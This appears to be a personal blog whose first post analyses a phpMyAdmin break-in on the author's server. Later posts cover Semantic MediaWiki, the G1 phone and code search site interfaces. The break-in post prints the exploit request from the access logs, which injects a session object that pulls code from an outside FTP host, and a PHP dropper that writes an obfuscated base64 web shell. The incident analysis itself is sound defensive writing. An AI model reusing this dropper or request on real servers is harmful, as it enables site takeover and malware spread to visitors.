Deconstruction of a Hack

Like any fellow server maintainers out there, I know that I will occasionally be the target of an anonymous persons ire. This week it was my turn. I run an Apache server with PHP for my personal projects, nothing important. I also run a number of apps to help me manage my server, like BASE to monitor my snort logs (overkill for a personal server, yes I know), and phpMyAdmin to manage the database portion.

I made the mistake of thinking that one of my apps was secure, and the further mistake of not updating it to the most recent version of an app. I blame my busy schedule with school and work for not keeping it more up to date. Today, phpMyAdmin was the culprit.

JIGGLING THE LOCKS

Unfortunately, I left my phpMyAdmin installation off the root, in an directory that wasn't protected with a password, I was foolishly relying on the built in cookie authentication to phpMyAdmin. After the attacker found my installation, it was only a matter of time.

91.224.160.132 - [21/Feb/2012:19:39:36 -0800] "POST /phpmyadmin/config/config.inc.php HTTP/1.1" 404 691
91.224.160.132 - [21/Feb/2012:19:39:36 -0800] "GET /phpmyadmin/ HTTP/1.1" 200 2439
91.224.160.132 - [21/Feb/2012:19:39:36 -0800] "POST /phpmyadmin/scripts/setup.php HTTP/1.1" 404 691
91.224.160.132 - [21/Feb/2012:19:39:37 -0800] "POST /phpmyadmin/scripts/signon.php HTTP/1.1" 302 20
91.224.160.132 - [21/Feb/2012:19:39:37 -0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 691
91.224.160.132 - [21/Feb/2012:19:39:37 -0800] "GET /phpmyadmin/index.php HTTP/1.1" 200 2437
91.224.160.132 - [21/Feb/2012:19:39:38 -0800] "GET /phpmyadmin/index.php?session_to_unset=123
&token=928b1ea05d6481d9997970f4bcf9af06&_SESSION%5B!bla%5D=%7cxxx%7ca%3a1%3a%7bi%3a0%3bO%3a10%3a
%22PMA_Config%22%3a1%3a%7bs%3a6%3a%22source%22%3bs%3a45%3a%22ftp%3a%2f%2fivan4174%3axuq5ytl9%4092.255.21.29%2f
httpdocs%22%3b%7d%7d HTTP/1.1" 200 20
91.224.160.132 - [21/Feb/2012:19:39:38 -0800] "GET /phpmyadmin/index.php?token=928b1ea05d6481d9997970f4bcf9af06 HTTP/1.1" 200 68
91.224.160.132 - [21/Feb/2012:19:39:45 -0800] "POST /wp-admin/zliiao.php HTTP/1.1" 200 35

One of the more popular exploits seem to be sending a php script code that will execute if the input isn't cleaned first. This seems to be the case here, I was looking through the source code of phpMyAdmin's index.php to see what would have possibly read this in and executed it, and I eyed one line in particular because it passed the entire array of $_GET into it, but I'm not sure if that was it. So I looked around some more. Since it appears to mention "PMA_Config" I thought I would search through phpMyAdmin's source for this. Turns out, the webapp.php file uses a _SESSION variable named PMA_Config to tell it the URI for something. This seems like the perfect place to stash a value from an external website that you want to execute, and sure enough, that is exactly what happens.

webapp.php snippet-

$parameters = array(
    'id'        => 'phpMyAdmin@' . $_SERVER['HTTP_HOST'],
    'uri'       => $_SESSION['PMA_Config']->get('PmaAbsoluteUri'),
    'status'    => 'yes',
    'location'  => 'no',
    'sidebar'   => 'no',
    'navigation' => 'no',
    'icon'      => 'phpMyAdmin',
);

Thankfully, it looks like in the newest version of phpMyAdmin they switched out the $_SESSION array for the $GLOBALS array. Hopefully there aren't any other little nasty surprises inside of phpMyAdmin's source.

ON THE INSIDE

What did this little nasty thing do? First it excutes some remote PHP code, this code is quite rudimentary, generating a random file, stuffing it in the first directory it executes in, which in this case happened to be a wordpress directory.

Some of the PHP code it retrieved from the remote site:

$dr = $_SERVER["DOCUMENT_ROOT"];$ran=rand(5,7);
for($i;$i<$ran;$i++) $sn.=chr(rand(97,122));
$sn .= '.php';
$gdarr = array();
if (is_writeable($dr)) $gdarr[]='';
if ($dir = @opendir($dr)) {
 while (false !== ($file = readdir($dir))) {
  $pfile = $dr.'/'.$file;
  if ($file!='.' && $file!='..') {
   if (is_dir($pfile) && is_writeable($pfile)) $gdarr[]='/'.$file;
  }
 }
}
if (count($gdarr) == 0) die('');
$spn = $gdarr[rand(0,count($gdarr)-1)].'/'.$sn;
$f=fopen($dr.$spn,'w');
fputs($f,"4p_Y*/(/*Y83yi*/base64_decode/*w$9Pr5C*/(/*j!wb*/'Lyo3bGA6LlhFKi9ldmFsLyo1LVRCeSovKC8qOk14VCovYmFzZTY'/*@5[O*/.  
(MUCH MORE BASE 64 GIBBERISH...) ");
fclose($f);
echo('--start-check'.'string--');
echo($spn);
echo('--end-check'.'string--');
die();

The code proceeds to go ahead and place an innocuous looking eval(base64_decode('5938h4g9838h4g348gherhgusehri... (BASE 64 GIBBERISH)') at the top of each index.php page.
Of course this code is anything but innocuous, it proceeds to redirect all requests to the root directory, where it has added it's own special sauce to the home page to load your browser up with some lovely malware via a java applet.

All that is required to "re-infect" the host if they choose to remove all the changed .php files is the simple random php file they have loaded up in a random directory. This file is called some random gibberish as well.

FIGHTING BACK

Unfortunately, without poring through log files, it's difficult to find where this little random php file is, especially at first. After looking through thousands of lines of log files, I decided to automate this a bit more. I enlisted the help of Process Monitor. This is quite a process intensive program as it's name implies, so I can only run it for a little while. After running it for a couple hours, I accumulated over 32 million events in this thing. Thankfully, the attacker tried to "regenerate" his infectious pages during this time, and that is when I caught the process doing all the badness. It was only a matter of deleting the script and reverting all the files after that. Thankfully the site is stored in subversion, so I don't have to worry about missing something that was changed.

CONCLUSION


Keep your apps up to date. And if you don't, make sure they aren't publicly facing.

My Semantic Experience

Over the past few months I've been focused on learning and developing my knowledge of the wiki-language. This has led to me discovering a rather interesting add-on for Mediawiki called Semantic Mediawiki. This extension is not currently used on Wikipedia as the database resources needed to support it would be rather substantial. Of course the benefits of having access to semantic data on the scale of Wikipedia would be immense, as many have made the case to the Wikipedia founder. One of the interesting things about the Semantic Mediawiki is that when a breadth of information is entered into a semantic wiki, the information can become an integral part in creating new aggregate data, all without duplication of the original data.

So, after that quick intro to the world of semantic mediawiki, I figured I would tell you what I've been looking forward to doing with the data.  I run an old school pen-and-paper role playing game, adapted for an online environment with a couple of friends. If you aren't familiar with how a role playing game works, just look it up on Google, there's plenty of explanations. In my game, I needed pretty detailed character sheets, to keep track of all the stats and skills of all the players in the game. In order to make sure they weren't cheating, I needed method that would facilitate change history on each document. The wiki format worked great, but then, as many technophile programmers do, I decided I wanted to take advantage of all that data in my wiki, on the character sheet. This has led to a wiki page unlike many I've seen, with auto-completion, drop-downs of sets of pages from certain categories, templates that compute the correct values to be displayed to the user on their page and even some properties used as decorators to give a page multiple values of the same property.

Now, all of that was great, and it made me very happy to have a character sheet that could be filled out in 5 minutes, and contain lots of meta-information. The problem I have, is that I now need something to let me extract properties from that character sheet outside of Mediawiki, and put into my own external app to show random numbers to the users (in other worlds, rolling dice) for the purposes of the game. After working with PHP and XML for a couple days, I was able to pull down all the data I needed from my wiki, and pop it into my dice rolling page. While it wasn't as easy as I thought it would be, I was able to pull down some of the defined semantic properties from the page. However, I'm still working on that dice page though, hopefully there will be easier ways to extract wiki data in the future.

My take away from the experience so far, has been that once you've setup Mediawiki with the Semantic Mediawiki & Semantic Forms extensions, you can really make data entry into your wiki very easy and even have a level of type-safety in your wiki, insuring data integrity, which anyone can appreciate.

Playing with the G1 for a couple minutes

After reading many reviews and comparisons of the G1 online, I decided to go out and see if I could find one at a store today. I found a T-Mobile store near where I live and I got my 5-10 minutes with one of these phones.

First Impression: It's bigger then my current phone, but not nearly as big as the large amount of reviews I've read seem to imply it is. Yes, it's a smart phone with a fold-out keyboard, but it works quite nicely. It's responsive and fun to use. One thing I found quite fun was the little control stick. That's one thing that isn't really explored in-depth in most reviews I've seen about the G1.

The little control stick is the alternate control scheme for the G1, for those of you who don't really wanna smudge up the screen. I think it's great, maybe could have been a bit bigger, and maybe a little more durable. The weird thing about it though, is that it feels as though it's vibrating under your finger, which gives it a strange sensation when using it.

Moving around in the phone is pretty easy once you figure out where all the little buttons are, not quite as intuitive as I would like button wise, but it's still very usable with the touch interface. I think the idea of having multiple means to do things isn't a bad thing.

The camera and picture button are placed in such a way that you might forget where it is if you happen to have the phone in landscape mode with the keyboard out. The pictures taken are good, and the photo responsiveness wasn't that bad either. If taking video isn't that important to you, then the media functionality of the phone is actually quite good. Using Youtube on the phone was cool, but I would rather have embedded flash support that works with whatever video happens to be embedded on the site, however I know that is too much to ask for.

Overall, the only thing that did surprise me a bit was the flimsy feel of the foldout keyboard. As most reviewers have stated, it has a certain cheap-plastic feel to it, like it's one step away from busting off, which isn't something I like in a phone that typically needs to go through some wear and tear.

Smart and simple does it.

Continuing on the thread of UI's from my last post, I thought I would take on the composition of UI's for usability. Now before I bore you with alot of web buzzwords, I want you to think back to successful websites. Digg.com, craigslist.com, slashdot.org, and of course google.com, just to name a few. What do these sites have in common? Well for one they are all popular sites that emphasize content over pizazz. Another thing they all have is a rather smart interface. To understand this completely, let me go over the different aspects of these sites.

• Digg.com
• No login required to view all stories and comments.
• Space between top of page and news stories is small.
• New stories are organized in a simple and easy to understand list.
• Clearly delineated sections guide your eye to the important parts.
• Bold colors are used sparingly and on parts that are actually important, so your eye doesn't have to dart around page to find important points and there are no visual tricks being used to fool you into looking at any specific section.
• Ads are clearly marked and not mixed in with the important parts.
• Craigslist.com
• No login required to view all stories and comments.
• All important info is right at the top of the front page.
  
• Although cluttered with links, the page gives a feeling of looking at a table of contents in a book, and is strangely familiar.
• No ads. (unique to this site)
• Everything is laid bare in front of you, not a lot of clicking to find what you need.
• Slashdot.org
• No login required to view all stories and comments.
• Space between top of page and news stories is small.
• New stories are organized in a simple and easy to understand list.
• Clearly delineated sections guide your eye to the important parts.
• Ads are clearly marked and not mixed in with the important parts.
• Google.com
• No login required to search web, news groups, news, products, maps and others.
  
• Very simple interface, click to results usually very small.
• Ads are clearly marked and not mixed in with important parts.
• Clearly delineated sections guide your eye to the important parts.

Obviously marketing, results and word of mouth play a huge role in why all of these sites are popular, not just their interfaces. But let's analyze their general similarities in interfaces for a minute, because if they were hard to use, people wouldn't be using them in droves, as they are.

I think it is interesting looking over popular sites, and although I am not a professional UI expert, I can make conclusions based on my own usage of these sites. What I know is that they are easy and fast to use. I don't like to waste my time with lots of clicking and searching, and the sites listed don't trick you into wasting your time with excessive advertisements and clicking to get at what you want.

I've looked over a few sites, and I can spot a winner simply by comparing it to existing sites in general use. Now what better thing to look and compare then something near and dear to my heart? I am a programmer, so I'm going to look at some code search engines, such as the recent Google code search and rate them as I see fit.

http://www.google.com/codesearch - 6/10
My first impression of Google code search is that the interface is exactly like the google web search engine, but since code is much more involved then just a simple link to a website, I am a little disappointed. In order to get what I want, I will need to click through a lot of different links to find what I want. This is made for someone who knows EXACTLY what they want, as the search box lets you use very advanced regular expressions to find what you want. This gains points simply because Google has a huge code base to draw from.

http://www.krugle.com/ - 8/10
My first impression of Krugle is that they put alot of work into making the interface usable, yet smart and full featured. After typing in one word and clicking once, I see that the interface is using full-screen ajax, which doesn't impress me at first, as I've seen this before with disappointing results. However, I find that each result opens a special tab that can be saved, and that a right-hand pane can be opened to show a directory view of the current item. Useful and very quick.

http://www.codefetch.com/ - 4/10 (slow server)
My first visit to this site, I am thinking immediately that this is a Google code search duplicate, but with room for delineation between different programming languages. Interesting, but still not enough to keep me coming back for more. So I try to use this search, and I am very disappointed in the speed at which the results return. The code is shown directly on the search results page, which is unique, but without a interface to view many multiple results in, this site is failing in the usability category.

http://www.snipplr.com/ - 7/10
At first glance, this site looks like del.icio.us for source code, which is a novel idea. Except that this site suffers what most new sites suffer from, a lack of content. I typed in the word encrypt and returned 0 results. The concept is good, the code display allows for comments, and a description before each code snippet. The code is displayed in the standard numbered list layout, allowing tags to be put on each snippet. However, the tabs at the top are laid out in a confusing way, and the search (which is the most useful thing) is too close to the top and right, where it is inconvenient, and you might miss it. The important stuff is there right on the front page displayed in a most recent/popular format like del.icio.us does. This site only loses points in it's speed, but to be fair, del.icio.us is about just as fast as this site.

http://www.koders.com/ - 7/10
Koders was one of the first code search sites I found. Although it's layout is similar to Google's minimalist approach, it is TOO minimalist. I want more options for searching. Although it gives an option to search for different licenses of code (something I haven't seen anywhere else), it doesn't give me any great new code searching features. It has another feature that lets you search for class and method definitions. This has the makings of a comprehensive code search site (the search by clicking function names is another example). The speed is definitely lacking, like Google or Krugle have going for it, but that may simply be a matter of infrastructure. This site does seem to have more codebase then any of the previous sites I found. The only drawback I found is that the "Koders" logo and bulky search box is at the top of all pages, which draws away from it's search.

http://labs.oreilly.com/code/ - 6/10
This page is simple, and it gives me something interesting, "recent searches" which is always useful for the casual code hacker. The search results are a little "bare" with a lot of whitespace that I would rather is used for displaying the important stuff. However, overall it is a satisfying search as the results display different books with code, and the code display is succinct enough to keep me interested. Although I feel a little biased here, seeing as I find many of O'Reilly's books useful to begin with.

http://www.codase.com/ - 8/10 (slow server)
When I first saw the home page for this code search engine, I thought wow, that looks detailed. It lets me search for code specific under certain situations, even variable names. It lets me delineate which language to search from, and gives me rather advanced options to use. However, I ran into problems searching, as the engine or server it is running on is incredibly slow. This engine impressed me with another very useful aspect though, it has a fully searchable API for Java, Windows, Linux and it looks like some other API's are in the works to be put online soon. Wow, not only that, but each function and other blocks of code can be toggled open and closed, giving this an advanced IDE feel. This one is by far the most advanced search engine I've seen, and it is too bad that it is running low-end hardware for what it has. I can't recommend this one simply because it is so slow it is practically unusable.

http://www.csourcesearch.net/ - 6/10
This site has a pretty horrible looking interface, and I would give it at least another point if it wasn't so bad looking. But other then that, it is an interesting ajax enabled search that lets you search by different programming characteristics, similar to codase.com, but this one is much faster. I do like the fact that the code is also color coded, and parts of it are clickable. This search is only for C code (if you haven't already guessed), but when you find results, it isn't readily obvious what each of the results are. So without some tweaking of their results page, this is not getting too far in the code searching arena.

Since I've been rating code search engines, I thought it only fair to include an open source open source engine software package here: http://gonzui.sourceforge.net/ Gonzui gives the means for anyone with a code base to let people on the web search through it. So, you can search on Google for Gonzui and you'll find many very similar websites. The Gonzui interface is just like a cut and dry Google search for code, which is what many other sites offer. Of course this has the added benefit of being customized, as it is open source. A few sites that use Gonzui: http://raa.ruby-lang.org/gonzui/, http://gonzui.cihar.com/, http://xen.begi.net:46984/

It will be interesting to see which code search will win in the end, but I have a feeling that many people will simply use Google regardless of which options are available because they trust it. I don't blame them, Google does a good job of giving you just the important stuff and no fluff. And I'll end with this, if you can make a site, give people the important stuff up front, don't make them click to get it, or else you stand to lose people's interest. That's right, I'm talking to you Soapbox (http://soapbox.msn.com/). You aren't going to kill Youtube or anyone else anytime soon by protecting your important stuff behind a login page.

The best interface is already here.

Have you ever seen the interface over at Pandora.com? If not, I suggest you go and check it out. The site is a great alternative to radio, but the thing I wanted to focus on was it's incredible use of flash. I am not a flash developer (yet), but I want to take this opportunity to say that the slick no-page reloading and not too much of a download make Pandora's website a great one. The ability to sign up from within the flash applet make it second to none.

I will see how many more interfaces I can find that use the same one-page-for-all approach. It's pretty funny that in this day and age of everything Ajax that we still have the same old approach to account creation.

I am a programmer, so I have no qualms about creating accounts on multiple sites that I visit, and thus I am very familiar with the standard account creation routine. What I have found though is that most sites use a standard account creation page to make sure that users are tracked, and some (if not all) even track their users before they sign up. My point is this, why don't most sites have a account creation process that is as painless as Pandora's? The technology is there, but for some reason people are not using it.